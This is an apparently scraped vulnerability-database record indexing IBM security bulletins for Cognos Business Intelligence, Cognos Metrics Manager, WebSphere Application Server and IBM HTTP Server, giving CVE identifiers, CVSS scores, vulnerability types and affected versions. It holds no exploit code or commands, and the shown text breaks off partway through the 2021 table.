\n--- \n**Published / Updated**| **Title** \nApril 2018| [Cognos Metrics Manager 2018 Q1 Security Update](<http://www.ibm.com/support/docview.wss?uid=swg22014720>) \nDecember 2017| [Multiple vulnerabilities in Libxml2 affect Cognos Metrics Manager](<http://www.ibm.com/support/docview.wss?uid=swg22011764>) \nDecember 2017| [Cognos Business Intelligence Server 2017Q4 Security Updater](<http://www.ibm.com/support/docview.wss?uid=swg22007952>) \nOctober 2017| [Multiple vulnerabilities in IBM Java Runtime affect Cognos Metrics Manager](<http://www.ibm.com/support/docview.wss?uid=swg22009441>) \nOctober 2017| [A vulnerability in the Apache Xerces-C XML Parser affects Cognos Metrics Manager.](<http://www.ibm.com/support/docview.wss?uid=swg22009438>) \nOctober 2017| [Cognos Business Intelligence Server 2017Q3 Security Updater](<http://www.ibm.com/support/docview.wss?uid=swg22009259>) \nOctober 2017| [A vulnerability in the libpng library affects Cognos Metrics Manager](<http://www.ibm.com/support/docview.wss?uid=swg22004076>) \nOctober 2017| [Multiple vulnerabilities in IBM Java Runtime affect Cognos Metrics Manager](<http://www.ibm.com/support/docview.wss?uid=swg22004070>) \nJune 2017| [Cognos Business Intelligence Server 2017Q2 Security Updater](<http://www.ibm.com/support/docview.wss?uid=swg22004036>) \nMay 2017| [Multiple vulnerabilities in IBM Java Runtime affect Cognos Metrics Manager](<http://www.ibm.com/support/docview.wss?uid=swg22004078>) \nMay 2017| [Multiple vulnerabilities in IBM Java Runtime affect Cognos Metrics Manager](<http://www.ibm.com/support/docview.wss?uid=swg22004077>) \nMay 2017| [Multiple vulnerabilities in OpenSSL affect Cognos Metrics Manager](<http://www.ibm.com/support/docview.wss?uid=swg22004074>) \nMay 2017| [Cognos Business Intelligence is NOT AFFECTED by the OpenSource Bouncy Castle Vulnerability (CVE-2015-7940)](<http://www.ibm.com/support/docview.wss?uid=swg22003426>) \nApril 2017| [Multiple vulnerabilities in Apache HttpComponents 
affect Cognos Metrics Manager (CVE-2012-6153, CVE-2014-3577)](<http://www.ibm.com/support/docview.wss?uid=swg21970193>) \nMarch 2017| [Multiple vulnerabilities in Apache Tomcat affect Cognos Metrics Manager (CVE-2016-0762, CVE-2016-6816)](<http://www.ibm.com/support/docview.wss?uid=swg21999723>) \nMarch 2017| [Cognos Business Intelligence Server 2017Q1 Security Updater](<http://www.ibm.com/support/docview.wss?uid=swg21999671>) \nMarch 2017| [Privilege Escalation vulnerability affects Cognos Business Intelligence (CVE-2016-8960)](<http://www.ibm.com/support/docview.wss?uid=swg21993718>) \nJanuary 2017| [Cognos Business Intelligence is affected by a vulnerability](<http://www.ibm.com/support/docview.wss?uid=swg21996809>) \nJanuary 2017| [Cognos Business Intelligence Server 2016Q4 Security Updater](<http://www.ibm.com/support/docview.wss?uid=swg21995691>) \nJanuary 2017| [A vulnerability in IBM Java Runtime affects Cognos Metrics Manager (CVE-2016-3485)](<http://www.ibm.com/support/docview.wss?uid=swg21995206>) \nJanuary 2017| [Multiple vulnerabilities in libxml2 affect Cognos Metrics Manager (CVE-2016-3705, CVE-2016-4447, CVE-2016-4448)](<http://www.ibm.com/support/docview.wss?uid=swg21995198>) \nJanuary 2017| [Vulnerabilities in OpenSSL affect Cognos Metrics Manager (CVE-2016-6302 CVE-2016-6304 CVE-2016-6303 CVE-2016-2177 CVE-2016-2178 CVE-2016-2179 CVE-2016-6306 CVE-2016-2181 CVE-2016-2183)](<http://www.ibm.com/support/docview.wss?uid=swg21993856>) \nJanuary 2017| [Cognos Business Intelligence Server 2016Q2 Security Updater](<http://www.ibm.com/support/docview.wss?uid=swg21984323>) \nOctober 2016| [Cognos Business Intelligence Server 2016Q1 Security Updater](<http://www.ibm.com/support/docview.wss?uid=swg21979767>) \nJuly 2016| [A vulnerability in the Apache Xerces-C XML parser affects Cognos Metrics Manager (CVE-2016-0729)](<http://www.ibm.com/support/docview.wss?uid=swg21986259>) \nJuly 2016| [A vulnerability in IBM Java Runtime affects Cognos Metrics Manager 
(CVE-2016-3427)](<http://www.ibm.com/support/docview.wss?uid=swg21985522>) \nJuly 2016| [A vulnerability in Apache Tomcat affects Cognos Metrics Manager (CVE-2015-5345)](<http://www.ibm.com/support/docview.wss?uid=swg21982821>) \nJuly 2016| [A vulnerability in OpenSSL affects Cognos Metrics Manager (CVE-2016-2106, CVE-2016-2107, CVE-2016-2108)](<http://www.ibm.com/support/docview.wss?uid=swg21977114>) \nMay 2016| [Cognos Business Intelligence Server is affected by CVE-2016-0398](<http://www.ibm.com/support/docview.wss?uid=swg21983247>) \nMay 2016| [Multiple vulnerabilities in libxml2 affect Cognos Metrics Manager (CVE-2015-1819, CVE-2015-5312, CVE-2015-7497, CVE-2015-7498, CVE-2015-7499, CVE-2015-7500, CVE-2015-7941, CVE-2015-7942, CVE-2015-8035, CVE-2015-8241, CVE-2015-8317)](<http://www.ibm.com/support/docview.wss?uid=swg21977221>) \nMay 2016| [Multiple vulnerabilities in IBM Java Runtime affect Cognos Metrics Manager (CVE-2016-0448, CVE-2016-0466)](<http://www.ibm.com/support/docview.wss?uid=swg21977134>) \nMarch 2016| [Multiple vulnerabilities in libpng affect Cognos Metrics Manager (CVE-2015-8126, CVE-2015-8472, CVE-2015-8540)](<http://www.ibm.com/support/docview.wss?uid=swg21976924>) \nFebruary 2016| [Several vulnerabilities in the libpng component of Cognos Business Intelligence Server (CVE-2015-8126, CVE-2015-8472, CVE-2015-8540)](<http://www.ibm.com/support/docview.wss?uid=swg21977053>) \nNovember 2015| [A vulnerability in IBM Java Runtime affects Cognos Metrics Manager (CVE-2015-4872)](<http://www.ibm.com/support/docview.wss?uid=swg21971753>) \nNovember 2015| [Vulnerability in Apache Commons affects Cognos Metrics Manager (CVE-2015-7450)](<http://www.ibm.com/support/docview.wss?uid=swg21971382>) \nNovember 2015| [Cognos Business Intelligence Server 2015Q4 Security Updater](<http://www.ibm.com/support/docview.wss?uid=swg21959874>) \nAugust 2015| [Cognos Business Intelligence Sever 2015Q3 Security 
Updater](<http://www.ibm.com/support/docview.wss?uid=swg21963468>) \nAugust 2015| [Multiple vulnerabilities in IBM Java Runtime affect Cognos Metrics Manager (CVE-2015-2625, CVE-2015-4748, CVE-2015-4749)](<http://www.ibm.com/support/docview.wss?uid=swg21963263>) \nAugust 2015| [Vulnerability in Tomcat affects Cognos Metrics Manager (CVE-2014-0230)](<http://www.ibm.com/support/docview.wss?uid=swg21962903>) \nAugust 2015| [Vulnerabilities in OpenSSL affect Cognos Metrics Manager (CVE-2015-1789, CVE-2015-1790, CVE-2015-1792)](<http://www.ibm.com/support/docview.wss?uid=swg21962686>) \nAugust 2015| [Vulnerability in RC4 stream cipher affects Cognos Business Intelligence Server (CVE-2015-2808)](<http://www.ibm.com/support/docview.wss?uid=swg21715530>) \nJuly 2015| [Vulnerability in Diffie-Hellman ciphers affects Cognos Mobile app on Android (CVE-2015-4000)](<http://www.ibm.com/support/docview.wss?uid=swg21959481>) \nJuly 2015| [Cognos Business Intelligence Sever 2015Q2 Security Updater](<http://www.ibm.com/support/docview.wss?uid=swg21903752>) \nJuly 2015| [Multiple vulnerabilities in IBM Java Runtime affect Cognos Metrics Manager (CVE-2015-0478, CVE-2015-0488, CVE-2015-2808)](<http://www.ibm.com/support/docview.wss?uid=swg21903565>) \nJuly 2015| [Vulnerability in Tomcat affects Cognos Metrics Manager (CVE-2014-0227)](<http://www.ibm.com/support/docview.wss?uid=swg21903036>) \nJuly 2015| [Vulnerabilities in OpenSSL affect Cognos Metrics Manager (CVE-2015-0286, CVE-2015-0287, CVE-2015-0288, CVE-2015-0289, CVE-2015-0293)](<http://www.ibm.com/support/docview.wss?uid=swg21902528>) \nJune 2015| [Vulnerability in Diffie-Hellman ciphers affects Cognos Metrics Manager (CVE-2015-4000)](<http://www.ibm.com/support/docview.wss?uid=swg21959812>) \nJune 2015| [Vulnerability in Diffie-Hellman ciphers affects Cognos Business Intelligence (CVE-2015-4000)](<http://www.ibm.com/support/docview.wss?uid=swg21959671>) \nMay 2015| [A vulnerability in the IBM Dojo Toolkit affects Cognos 
Business Intelligence (CVE-2014-8917)](<http://www.ibm.com/support/docview.wss?uid=swg21700709>) \nMay 2015| [A vulnerability in the IBM Dojo Toolkit affects Cognos Metrics Manager (CVE-2014-8917)](<http://www.ibm.com/support/docview.wss?uid=swg21697317>) \nApril 2015| [Vulnerability in RC4 stream cipher affects Cognos Mobile app on Android (CVE-2015-2808)](<http://www.ibm.com/support/docview.wss?uid=swg21883588>) \nApril 2015| [Vulnerability in RC4 stream cipher affects Cognos Metrics Manager (CVE-2015-2808)](<http://www.ibm.com/support/docview.wss?uid=swg21720187>) \nApril 2015| [Vulnerabilities in IBM WebSphere Application Server and GSKit affects Cognos Business Intelligence (CVE-2015-0138, CVE-2015-0159)](<http://www.ibm.com/support/docview.wss?uid=swg21701210>) \nApril 2015| [Vulnerability in IBM Runtime Environment Java Technology Edition affects Cognos Business Intelligence Server (CVE-2015-0138)](<http://www.ibm.com/support/docview.wss?uid=swg21701200>) \nApril 2015| [Vulnerability in IBM Java Runtime affects Cognos Metrics Manager (CVE-2015-0138)](<http://www.ibm.com/support/docview.wss?uid=swg21701192>) \nMarch 2015| [Cognos Business Intelligence Server is affected by multiple vulnerabilities](<http://www.ibm.com/support/docview.wss?uid=swg21698818>) \nMarch 2015| [Multiple vulnerabilities in IBM Java Runtime affect Cognos Metrics Manager (CVE-2015-0410, CVE-2014-6593)](<http://www.ibm.com/support/docview.wss?uid=swg21698154>) \nMarch 2015| [Multiple vulnerabilities in the Libpng library affect Cognos Metrics Manager (CVE-2015-0973, CVE-2014-9495)](<http://www.ibm.com/support/docview.wss?uid=swg21697296>) \nMarch 2015| [Multiple vulnerabilities in OpenSSL affect Cognos Metrics Manager (CVE-2014-3569, CVE-2014-3570, CVE-2014-3571, CVE-2014-3572, CVE-2014-8275, CVE-2015-0204)](<http://www.ibm.com/support/docview.wss?uid=swg21695694>) \nMarch 2015| [Multiple vulnerabilities in IBM Java Runtime affect Cognos Metrics Manager (CVE-2014-3566, 
CVE-2014-6457)](<http://www.ibm.com/support/docview.wss?uid=swg21691561>) \nFebruary 2015| [A vulnerability in IBM Java Runtime affects Cognos Metrics Manager (CVE-2014-4263)](<http://www.ibm.com/support/docview.wss?uid=swg21688596>) \nJanuary 2015| [TLS padding vulnerability affects Cognos Business Intelligence (CVE-2014-8730)](<http://www.ibm.com/support/docview.wss?uid=swg21693422>) \nDecember 2014| [Cognos Business Intelligence Server is affected by multiple vulnerabilities (CVE-2014-3566, CVE-2014-6145, CVE-2014-1568, CVE-2014-4263, CVE-2012-5784, CVE-2014-3513, CVE-2014-3567 and CVE-2014-3568)](<http://www.ibm.com/support/docview.wss?uid=swg21692267>) \nDecember 2014| [A vulnerability in the Mozilla Network Security Services (NSS) affects Cognos Metrics Manager (CVE-2014-1568)](<http://www.ibm.com/support/docview.wss?uid=swg21691656>) \nDecember 2014| [A vulnerability in Apache Axis affects Cognos Metrics Manager (CVE-2012-5784)](<http://www.ibm.com/support/docview.wss?uid=swg21691655>) \nDecember 2014| [Multiple vulnerabilities in OpenSSL affect Cognos Metrics Manager (CVE-2014-3567, CVE-2014-3513, CVE-2014-3568)](<http://www.ibm.com/support/docview.wss?uid=swg21689333>) \nDecember 2014| [Vulnerability in SSLv3 affects Cognos Metrics Manager (CVE-2014-3566)](<http://www.ibm.com/support/docview.wss?uid=swg21687710>) \nNovember 2014| [Cognos BI Server is affected by the following vulnerabilities: CVE-2014-0107, CVE-2014-0075, CVE-2014-0096, CVE-2014-0099, CVE-2014-0119, CVE-2014-0878, CVE-2014-0460](<http://www.ibm.com/support/docview.wss?uid=swg21682740>) \nSeptember 2014| [Cognos Business Intelligence is not affected by the Bash vulnerabilities (CVE-2014-6271, CVE-2014-7169, CVE-2014-7186, CVE-2014-7187, CVE-2014-6277, and CVE-2014-6278)](<http://www.ibm.com/support/docview.wss?uid=swg21685556>) \nSeptember 2014| [Cognos Metrics Manager is affected by the following IBM Java Runtime vulnerabilities: CVE-2014-0878, 
CVE-2014-0460](<http://www.ibm.com/support/docview.wss?uid=swg21683527>) \nSeptember 2014| [Cognos Metrics Manager is affected by a vulnerability in Apache Xalan-Java (CVE-2014-0107)](<http://www.ibm.com/support/docview.wss?uid=swg21683524>) \nSeptember 2014| [Cognos Metrics Manager is affected by the following Tomcat vulnerabilities: CVE-2014-0075, CVE-2014-0096, CVE-2014-0099, CVE-2014-0119](<http://www.ibm.com/support/docview.wss?uid=swg21683430>) \nSeptember 2014| [OpenSSL Heartbleed Vulnerability](<http://www.ibm.com/support/docview.wss?uid=swg21669823>) \nAugust 2014| [Cognos Metrics Manager is affected by the following OpenSSL vulnerabilities: CVE-2014-0224](<http://www.ibm.com/support/docview.wss?uid=swg21677225>) \nJuly 2014| [Cognos BI Server is affected by the following OpenSSL vulnerability: CVE-2014-0224](<http://www.ibm.com/support/docview.wss?uid=swg21680511>) \nJuly 2014| [Security vulnerabilities have been identified in IBM DB2 shipped with Cognos Business Intelligence (CVE-2013-6747, CVE-2014-0963)](<http://www.ibm.com/support/docview.wss?uid=swg21674489>) \nJuly 2014| [A security vulnerability has been identified in IBM WebSphere Application Server shipped with Cognos Business Intelligence (CVE-2014-0114)](<http://www.ibm.com/support/docview.wss?uid=swg21674099>) \nMay 2014| [Multiple security exposures in Cognos BI Server (CVE-2014-0416, CVE-2014-0423, CVE-2013-4322)](<http://www.ibm.com/support/docview.wss?uid=swg21671340>) \nMarch 2014| [Multiple security exposures in Cognos BI Server (CVE-2013-6954, CVE-2013-6732, CVE-2013-5802, CVE-2013-5825, CVE-2014-0854, CVE-2014-0861)](<http://www.ibm.com/support/docview.wss?uid=swg21662856>) \nNovember 2013| [Cognos Business Intelligence (CVE-2013-3030, CVE-2013-4002, CVE-2013-2407, CVE-2013-2450, CVE-2013-4034, CVE-2013-5372)](<http://www.ibm.com/support/docview.wss?uid=swg21652590>) \n \n\\-->\n\n[{\"Product\":{\"code\":\"SSTSF6\",\"label\":\"IBM Cognos Analytics\"},\"Business 
Unit\":{\"code\":\"BU053\",\"label\":\"Cloud & Data Platform\"},\"Component\":\"--\",\"Platform\":[{\"code\":\"PF025\",\"label\":\"Platform Independent\"}],\"Version\":\"11.0\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB10\",\"label\":\"Data and AI\"}},{\"Product\":{\"code\":\"SSEP7J\",\"label\":\"Cognos Business Intelligence\"},\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Component\":\" \",\"Platform\":[{\"code\":\"\",\"label\":\"\"}],\"Version\":\"10.2;10.2.1;10.2.2\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB10\",\"label\":\"Data and AI\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2018-07-19T16:57:09", "type": "ibm", "title": "Security Bulletins - Cognos Analytics and Cognos Business Intelligence", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-5784", "CVE-2012-6153", "CVE-2013-2407", "CVE-2013-2450", "CVE-2013-3030", "CVE-2013-4002", "CVE-2013-4034", "CVE-2013-4322", "CVE-2013-5372", "CVE-2013-5802", "CVE-2013-5825", "CVE-2013-6732", "CVE-2013-6747", "CVE-2013-6954", "CVE-2014-0075", "CVE-2014-0096", "CVE-2014-0099", "CVE-2014-0107", 
"CVE-2014-0114", "CVE-2014-0119", "CVE-2014-0224", "CVE-2014-0227", "CVE-2014-0230", "CVE-2014-0423", "CVE-2014-0460", "CVE-2014-0854", "CVE-2014-0861", "CVE-2014-0878", "CVE-2014-0963", "CVE-2014-1568", "CVE-2014-3513", "CVE-2014-3566", "CVE-2014-3567", "CVE-2014-3568", "CVE-2014-3569", "CVE-2014-3570", "CVE-2014-3571", "CVE-2014-3572", "CVE-2014-3577", "CVE-2014-4263", "CVE-2014-6145", "CVE-2014-6271", "CVE-2014-6277", "CVE-2014-6278", "CVE-2014-6457", "CVE-2014-6593", "CVE-2014-7169", "CVE-2014-7186", "CVE-2014-7187", "CVE-2014-8275", "CVE-2014-8730", "CVE-2014-8917", "CVE-2014-9495", "CVE-2015-0138", "CVE-2015-0159", "CVE-2015-0204", "CVE-2015-0286", "CVE-2015-0287", "CVE-2015-0288", "CVE-2015-0289", "CVE-2015-0293", "CVE-2015-0410", "CVE-2015-0478", "CVE-2015-0488", "CVE-2015-0973", "CVE-2015-1789", "CVE-2015-1790", "CVE-2015-1792", "CVE-2015-1819", "CVE-2015-2017", "CVE-2015-2625", "CVE-2015-2808", "CVE-2015-4000", "CVE-2015-4748", "CVE-2015-4749", "CVE-2015-4872", "CVE-2015-5312", "CVE-2015-5345", "CVE-2015-7450", "CVE-2015-7497", "CVE-2015-7498", "CVE-2015-7499", "CVE-2015-7500", "CVE-2015-7940", "CVE-2015-7941", "CVE-2015-7942", "CVE-2015-8035", "CVE-2015-8126", "CVE-2015-8241", "CVE-2015-8317", "CVE-2015-8472", "CVE-2015-8540", "CVE-2016-0201", "CVE-2016-0398", "CVE-2016-0448", "CVE-2016-0466", "CVE-2016-0729", "CVE-2016-0762", "CVE-2016-2106", "CVE-2016-2107", "CVE-2016-2108", "CVE-2016-2177", "CVE-2016-2178", "CVE-2016-2179", "CVE-2016-2181", "CVE-2016-2183", "CVE-2016-3427", "CVE-2016-3485", "CVE-2016-3705", "CVE-2016-4447", "CVE-2016-4448", "CVE-2016-5983", "CVE-2016-6302", "CVE-2016-6303", "CVE-2016-6304", "CVE-2016-6306", "CVE-2016-6816", "CVE-2016-8960"], "modified": "2018-07-19T16:57:09", "id": "D2E48469AB3A6F2B1FEAEFDF00F68B8BC2F210C7E3BBABA5556DFDE4C6DB7ECD", "href": "https://www.ibm.com/support/pages/node/568041", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-07-27T22:03:06", "description": "## 
Question\n\nIs there a list that contains the security bulletins that apply to WebSphere Application Server and IBM HTTP Server?\n\n## Answer\n\nThe following table is provided to help you locate WebSphere Application Server and IBM HTTP Server security bulletins. These are listed numerically by CVE number not by the last one published.\n\nNote the IBM Java runtime included with WebSphere Application Server provides an execution environment for non-IBM code. While the below table includes all IBM Java vulnerabilities related to the WebSphere Application Server product, there might be additional IBM Java vulnerabilities which impact non-IBM code running in your WebSphere Application Server environment. For a listing of all IBM Java security bulletins, refer to [_IBM Java Security Alerts_](<https://www.ibm.com/developerworks/java/jdk/alerts/>). To determine the Java SDK version used with WebSphere Application Server, refer to the [_Verify Java SDK version shipped with WebSphere Application Server_](<http://www-01.ibm.com/support/docview.wss?rs=180&uid=swg27005002>).\n\nTo avoid preventable security issues, it is recommended that you stay up-to-date on the most current maintenance options for your products. 
You can also subscribe to the security bulletins for each of your products as provided in this link, [_IBM Security Bulletins_](<http://www.ibm.com/security/secure-engineering/bulletins.html>).\n\nWhen significant updates have been made to security bulletins, it will be noted with the date of the last update in the bulletin columns.\n\nNote: Starting 07/16/2020, the most recent fix published will be added to the top of this list below as well as in numerical order by year.\n\n**Recent CVEs (previous 15 published from most recent to least recent)**\n\n**Name **\n\n| \n\n**CVE**\n\n| \n\n**CVSS Score**\n\n| \n\n**WebSphere Application Server Bulletin or Assessment**\n\n| \n\n**IBM HTTP Server Bulletin or Assessment**\n\n| \n\n**Versions Affected** \n \n---|---|---|---|---|--- \n| CVE-2022-22477 | 6.1 | [Cross-site Scripting](<https://www.ibm.com/support/pages/node/6603417>) | Not affected | 9.0,8.5 \n| CVE-2022-22473 | 3.7 | [Information Disclosure](<https://www.ibm.com/support/pages/node/6603421>) | Not affected | 9.0,8.5,8.0,7.0 \n| CVE-2019-11777 | 7.5 | [Spoofing vulnerability](<https://www.ibm.com/support/pages/node/6602039>) | Not affected | Liberty \n| CVE-2022-22476 | 5.0 | [Identity Spoofing](<https://www.ibm.com/support/pages/node/6602015>) | Not affected | Liberty \n| CVE-2022-26377 | 7.3 | Not affected | [HTTP Request Smuggling](<https://www.ibm.com/support/pages/node/6595149>) | 7.0,8.0,8.5,9.0 \n| CVE-2022-28614 | 5.3 | Not affected | [Information Disclosure](<https://www.ibm.com/support/pages/node/6595149>) | 7.0,8.0,8.5,9.0 \n| CVE-2022-28615 | 6.5 | Not affected | [Information Disclosure](<https://www.ibm.com/support/pages/node/6595149>) | 7.0,8.0,8.5,9.0 \n| CVE-2022-29404 | 5.3 | Not affected | [Denial of Service](<https://www.ibm.com/support/pages/node/6595149>) | 7.0,8.0,8.5,9.0 \n| CVE-2022-30556 | 5.3 | Not affected | [Information Disclosure](<https://www.ibm.com/support/pages/node/6595149>) | 7.0,8.0,8.5,9.0 \n| CVE-2022-31813 | 5.3 | Not 
affected | [Bypass Security](<https://www.ibm.com/support/pages/node/6595149>) | 7.0,8.0,8.5,9.0 \n| CVE-2022-21496 | 5.3 | [IBM Java SDK for April 2022](<https://www.ibm.com/support/pages/node/6594523>) | Not affected | 9.0,8.5,Liberty \n| CVE-2022-21299 | 5.3 | [IBM Java SDK for April 2022](<https://www.ibm.com/support/pages/node/6594523>) | Not affected | 9.0,8.5,Liberty \n| CVE-2022-22365 | 5.6 | [Spoofing vulnerability](<https://www.ibm.com/support/pages/node/6587947>) | Not affected | 9.0,8.5,8.0,7.0 \n| CVE-2022-22475 | 7.1 | [Identity Spoofing](<https://www.ibm.com/support/pages/node/6586734>) | Not affected | Liberty \n \n**2022 CVEs**\n\n**Name **\n\n| \n\n**CVE**\n\n| \n\n**CVSS Score**\n\n| \n\n**WebSphere Application Server Bulletin or Assessment**\n\n| \n\n**IBM HTTP Server Bulletin or Assessment**\n\n| \n\n**Versions Affected** \n \n---|---|---|---|---|--- \n| CVE-2022-31813 | 5.3 | Not affected | [Bypass Security](<https://www.ibm.com/support/pages/node/6595149>) | 7.0,8.0,8.5,9.0 \n| CVE-2022-30556 | 5.3 | Not affected | [Information Disclosure](<https://www.ibm.com/support/pages/node/6595149>) | 7.0,8.0,8.5,9.0 \n| CVE-2022-29404 | 5.3 | Not affected | [Denial of Service](<https://www.ibm.com/support/pages/node/6595149>) | 7.0,8.0,8.5,9.0 \n| CVE-2022-28615 | 6.5 | Not affected | [Information Disclosure](<https://www.ibm.com/support/pages/node/6595149>) | 7.0,8.0,8.5,9.0 \n| CVE-2022-28614 | 5.3 | Not affected | [Information Disclosure](<https://www.ibm.com/support/pages/node/6595149>) | 7.0,8.0,8.5,9.0 \n| CVE-2022-26377 | 7.3 | Not affected | [HTTP Request Smuggling](<https://www.ibm.com/support/pages/node/6595149>) | 7.0,8.0,8.5,9.0 \n| CVE-2022-25315 | 7.8 | Not affected | [Remote Code Execution](<https://www.ibm.com/support/pages/node/6560814>) | 9.0,8.5,8.0,7.0 \n| CVE-2022-25313 | 5.5 | Not affected | [Denial of Service](<https://www.ibm.com/support/pages/node/6560814>) | 9.0,8.5,8.0,7.0 \n| CVE-2022-25236 | 5.3 | Not affected | [Denial of 
Service](<https://www.ibm.com/support/pages/node/6560814>) | 9.0,8.5,8.0,7.0 \n| CVE-2022-25235 | 3.3 | Not affected | [Denial of Service](<https://www.ibm.com/support/pages/node/6560814>) | 9.0,8.5,8.0,7.0 \n| CVE-2022-23990 | 9.8 | Not affected | [Remote Code Execution](<https://www.ibm.com/support/pages/node/6559296>) | 9.0,8.5,8.0,7.0 \n| CVE-2022-23852 | 9.8 | Not affected | [Remote Code Execution](<https://www.ibm.com/support/pages/node/6559296>) | 9.0,8.5,8.0,7.0 \n| CVE-2022-23307 | 9.8 | [Remote Code Execution](<https://www.ibm.com/support/pages/node/6557248>) | Not affected | 9.0,8.5,8.0,7.0,Liberty \n| CVE-2022-23305 | 6.5 | [SQL Injection](<https://www.ibm.com/support/pages/node/6557248>) | Not affected | 9.0,8.5,8.0,7.0,Liberty \n| CVE-2022-23302 | 8.8 | [Remote Code Execution](<https://www.ibm.com/support/pages/node/6557248>) | Not affected | 9.0,8.5,8.0,7.0,Liberty \n| CVE-2022-22827 | 7.8 | Not affected | [Remote Code Execution](<https://www.ibm.com/support/pages/node/6559296>) | 9.0,8.5,8.0,7.0 \n| CVE-2022-22826 | 7.8 | Not affected | [Remote Code Execution](<https://www.ibm.com/support/pages/node/6559296>) | 9.0,8.5,8.0,7.0 \n| CVE-2022-22825 | 7.8 | Not affected | [Remote Code Execution](<https://www.ibm.com/support/pages/node/6559296>) | 9.0,8.5,8.0,7.0 \n| CVE-2022-22824 | 7.8 | Not affected | [Remote Code Execution](<https://www.ibm.com/support/pages/node/6559296>) | 9.0,8.5,8.0,7.0 \n| CVE-2022-22823 | 7.8 | Not affected | [Remote Code Execution](<https://www.ibm.com/support/pages/node/6559296>) | 9.0,8.5,8.0,7.0 \n| CVE-2022-22822 | 7.8 | Not affected | [Remote Code Execution](<https://www.ibm.com/support/pages/node/6559296>) | 9.0,8.5,8.0,7.0 \n| CVE-2022-22721 | 7.3 | Not affected | [Buffer Overflow](<https://www.ibm.com/support/pages/node/6565413>) | 9.0,8.5,8.0,7.0 \n| CVE-2022-22720 | 7.3 | Not affected | [HTTP Request Smuggling](<https://www.ibm.com/support/pages/node/6565413>) | 9.0,8.5,8.0,7.0 \n| CVE-2022-22719 | 5.3 | Not affected 
| [Denial of Service](<https://www.ibm.com/support/pages/node/6565413>) | 9.0,8.5,8.0,7.0 \n| CVE-2022-22477 | 6.1 | [Cross-site Scripting](<https://www.ibm.com/support/pages/node/6603417>) | Not affected | 9.0,8.5 \n| CVE-2022-22476 | 5.0 | [Identity Spoofing](<https://www.ibm.com/support/pages/node/6602015>) | Not affected | Liberty \n| CVE-2022-22475 | 7.1 | [Identity Spoofing](<https://www.ibm.com/support/pages/node/6586734>) | Not affected | Liberty \n| CVE-2022-22473 | 3.7 | [Information Disclosure](<https://www.ibm.com/support/pages/node/6603421>) | Not affected | 9.0,8.5,8.0,7.0 \n| CVE-2022-22393 | 3.1 | [Information Disclosure](<https://www.ibm.com/support/pages/node/6585704>) | Not affected | Liberty \n| CVE-2022-22365 | 5.6 | [Spoofing vulnerability](<https://www.ibm.com/support/pages/node/6587947>) | Not affected | 9.0,8.5,8.0,7.0 \n| CVE-2022-22310 | 4.8 | [Information Disclosure](<https://www.ibm.com/support/pages/node/6541530>) | Not affected | Liberty \n| CVE-2022-21496 | 5.3 | [IBM Java SDK for April 2022 CPU](<https://www.ibm.com/support/pages/node/6594523>) | | 9.0,8.5,Liberty \n| CVE-2022-21340 | 5.3 | [IBM Java SDK for January 2022 CPU](<https://www.ibm.com/support/pages/node/6559306>) | Not affected | 9.0,8.5,Liberty \n| CVE-2022-21229 | 5.3 | [IBM Java SDK for April 2022 CPU](<https://www.ibm.com/support/pages/node/6594523>) | | 9.0,8.5,Liberty \n \n**2021 CVEs**\n\n**Name **\n\n| \n\n**CVE**\n\n| \n\n**CVSS Score**\n\n| \n\n**WebSphere Application Server Bulletin or Assessment**\n\n| \n\n**IBM HTTP Server Bulletin or Assessment**\n\n| \n\n**Versions Affected** \n \n---|---|---|---|---|--- \n| CVE-2021-46708 | 4.3 | [Clickjacking vulnerability](<https://www.ibm.com/support/pages/node/6569505>) | Not affected | Liberty \n| CVE-2021-46143 | 7.8 | Not affected | [Remote Code Execution](<https://Denial of Service>) | 7.0,8.0,8.5,9.0 \n| CVE-2021-45960 | 5.5 | Not affected | [Denial of Service](<https://www.ibm.com/support/pages/node/6559296>) | 
7.0,8.0,8.5,9.0 \n| CVE-2021-45105 | 7.5 | [Denial of Service](<https://www.ibm.com/support/pages/node/6538148>) | Not affected | 9.0, 8.5 \n| CVE-2021-45046 | 9.0 | [Denial of Service](<https://www.ibm.com/support/pages/node/6526750>) | Not affected | 9.0,8.5,8.0,7.0,Liberty \n| CVE-2021-44832 | 6.6 | [Remote Code Execution](<https://www.ibm.com/support/pages/node/6538148>) | Not affected | 9.0, 8.5 \n| CVE-2021-44790 | 9.8 | Not affected | [Buffer overflow](<https://www.ibm.com/support/pages/node/6540288>) | 9.0 \nLog4Shell | CVE-2021-44228 | 10 | [Remote Code Execution](<https://www.ibm.com/support/pages/node/6525706>) | Not affected | 9.0, 8.5 \n| CVE-2021-44224 | 8.2 | Not affected | [Denial of Service](<https://www.ibm.com/support/pages/node/6540288>) | 9.0 \n| CVE-2021-40438 | 9.0 | Not affected | [Server-side request forgery](<https://www.ibm.com/support/pages/node/6493841>) | 9.0 \n| CVE-2021-39275 | 3.7 | Not affected | [Buffer overflow](<https://www.ibm.com/support/pages/node/6493845>) | 9.0, 8.5, 8.0, 7.0 \n| CVE-2021-39038 | 4.4 | [Clickjacking vulnerability](<https://www.ibm.com/support/pages/node/6559044>) | Not affected | 9.0, Liberty \n| CVE-2021-39031 | 7.5 | [LDAP Injection](<https://www.ibm.com/support/pages/node/6550488>) | Not affected | Liberty \n| CVE-2021-38951 | 7.5 | [Denial of 